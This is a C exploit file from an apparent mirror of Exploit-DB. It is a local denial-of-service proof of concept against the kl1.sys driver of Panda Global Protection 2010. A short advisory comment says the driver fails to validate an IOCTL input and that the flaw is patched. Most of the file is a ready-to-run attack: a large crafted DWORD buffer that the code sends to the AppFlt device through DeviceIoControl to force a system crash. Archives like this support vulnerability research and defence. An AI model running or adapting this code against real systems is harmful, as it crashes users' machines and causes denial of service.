bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/16022.c
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

263 lines
No EOL
11 KiB
C
Raw Blame History

#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <string.h>
/*
Program : Panda Global Protection 2010 (3.01.00)
Homepage : http://www.pandasecurity.com
Discovery : 2010/04/09
Author Contacted : 2010/07/15
Status of vuln : Patched !
Found by : Heurs
This Advisory : Heurs
Contact : s.leberre@sysdream.com
//----- Application description
Antivirus Global Protection 2010 is the most complete product, with everything
you need to protect your computer and information. It protects you from viruses,
spyware, rootkits, hackers, online fraud, identity theft and all other Internet
threats. The anti-spam engine will keep your inbox free from junk mail while the
Parental Control feature will keep your family safe when using the Internet. You
can also back up important files (documents, music, photos, etc.) to a CD/DVD or
online (5GB free space available) and restore them in case of accidental loss or
damage. And thanks to the most innovative and new detection technologies and improved
Collective Intelligence, the solution is now much faster than previous versions.
//----- Description of vulnerability
kl1.sys driver don't check inputs integer of an IOCTL. An exception can be
thrown if we modify one DWORD.
With my test I can't do best exploitation than a BSOD.
//----- Credits
http://www.sysdream.com
http://www.hackinparis.com/
http://ghostsinthestack.org
s.leberre at sysdream dot com
heurs at ghostsinthestack dot org
//----- Greetings
Mysterie
*/
int __cdecl main(int argc, char* argv[])
{
HANDLE hDevice = (HANDLE) 0xffffffff;
DWORD NombreByte;
DWORD Crashing[] = {
0xaaaaaaaa, 0xbbbbbbbb, 0xcccccccc, 0xdddddddd,
0xeeeeeeee, 0x00000000, 0x001cfdea, 0x002dc6c0,
0x000000a8, 0x0044005c, 0x00760065, 0x00630069,
0x005c0065, 0x00610048, 0x00640072, 0x00690064,
0x006b0073, 0x006f0056, 0x0075006c, 0x0065006d,
0x005c0031, 0x00720050, 0x0067006f, 0x00610072,
0x0020006d, 0x00690046, 0x0065006c, 0x005c0073,
0x00610050, 0x0064006e, 0x00200061, 0x00650053,
0x00750063, 0x00690072, 0x00790074, 0x0050005c,
0x006e0061, 0x00610064, 0x00470020, 0x006f006c,
0x00610062, 0x0020006c, 0x00720050, 0x0074006f,
0x00630065, 0x00690074, 0x006e006f, 0x00320020,
0x00310030, 0x005c0030, 0x00650057, 0x00500062,
0x006f0072, 0x00790078, 0x0065002e, 0x00650078,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161, 0x61616161, 0x61616161, 0x61616161,
0x61616161
};
char out[sizeof(Crashing)];
printf("Local DoS - Panda Global Protection 2010 (3.01.00)\n\n");
hDevice = CreateFile("\\\\.\\AppFlt",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
DeviceIoControl(hDevice,0x06660d4c,Crashing,sizeof(Crashing),out,sizeof(Crashing),&NombreByte,NULL);
printf("Sploit Send.\nhDevice = %x\n", hDevice);
CloseHandle(hDevice);
getch();
return 0;
}
Reference in a new issue View git blame Copy permalink